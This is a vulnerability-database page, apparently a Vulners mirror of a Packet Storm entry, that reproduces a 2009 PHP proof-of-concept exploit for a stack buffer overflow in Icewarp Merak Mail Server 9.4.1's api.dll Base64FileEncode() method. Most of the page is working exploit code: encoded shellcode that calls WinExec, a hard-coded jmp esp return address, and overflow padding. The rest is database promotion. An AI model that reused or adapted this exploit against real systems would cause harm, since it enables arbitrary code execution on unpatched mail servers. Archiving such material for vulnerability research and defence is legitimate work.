Lucene search
K

Icewarp Merak Mail Server 9.4.1 Overflow

🗓️ 24 Apr 2009 00:00:00Reported by Nine:Situations:GroupType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 20 Views

Icewarp Merak Mail Server 9.4.1 Buffer Overflow in api.dl

Code
`<?php  
/* Icewarp Merak Mail Server 9.4.1 IceWarpServer.APIObject/api.dll  
Base64FileEncode() stack based buffer overflow poc  
by Nine:Situations:Group::surfista  
site: http://retrogod.altervista.org/  
  
api.dll contains a stack based buffer overflow in the second argument of  
Base64FileEncode() method, this shared library can be loaded ex. by the  
IceWarp PHP extension which is carried by the Webmail service. You have  
interesting results if the final argument of the icewarp_apiobjectcall()  
function is exposed to remote user input, which is possible by design, with  
the vulnerable method specified.  
We are searching a remote vector for this!  
  
*/  
  
if (php_sapi_name() <> "cgi-fcgi") {  
die("Launch from the merak php console!");  
}  
  
if (!function_exists("icewarp_apiobjectcall")) {  
die("You need the icewarp extension loaded!");  
}  
  
$shellcode= //original scode, alpha2 esp <sh.txt  
"\xeb\x13\x5b\x31\xc0\x50\x31\xc0\x88\x43\x4a\x53".  
"\xbb\x0d\x25\x86\x7c". //WinExec, kernel32.dll XP SP3  
"\xff\xd3\x31\xc0\xe8\xe8\xff\xff\xff".  
"cmd /c start calc && ".  
"\xff";  
  
$shellcode="TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP".  
"8ABuJIJK5CCktqO0rpP1kpOxcsczF3OKdMUumVQlkON3P1".  
"YPkXhhyokOyo1sPmST10FOqs7PSCrT1q3BrT5pRCaqPlRC".  
"wPQ6EvgPKOksA";  
  
$eip="\x2c\x47\x4b\x01"; //jmp esp - icewarpphp.dll  
  
$bof=str_repeat("A",0x258).  
"BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNN".  
$eip.  
$shellcode;  
  
$_x = icewarp_apiobjectcall(0, '', 'IceWarpServer.APIObject');  
  
$source="AAAA";  
$destination=$bof;  
  
icewarp_apiobjectcall( $_x, "Base64FileEncode", $source , $destination );  
  
?>  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

24 Apr 2009 00:00Current
0.3Low risk
Vulners AI Score0.3
20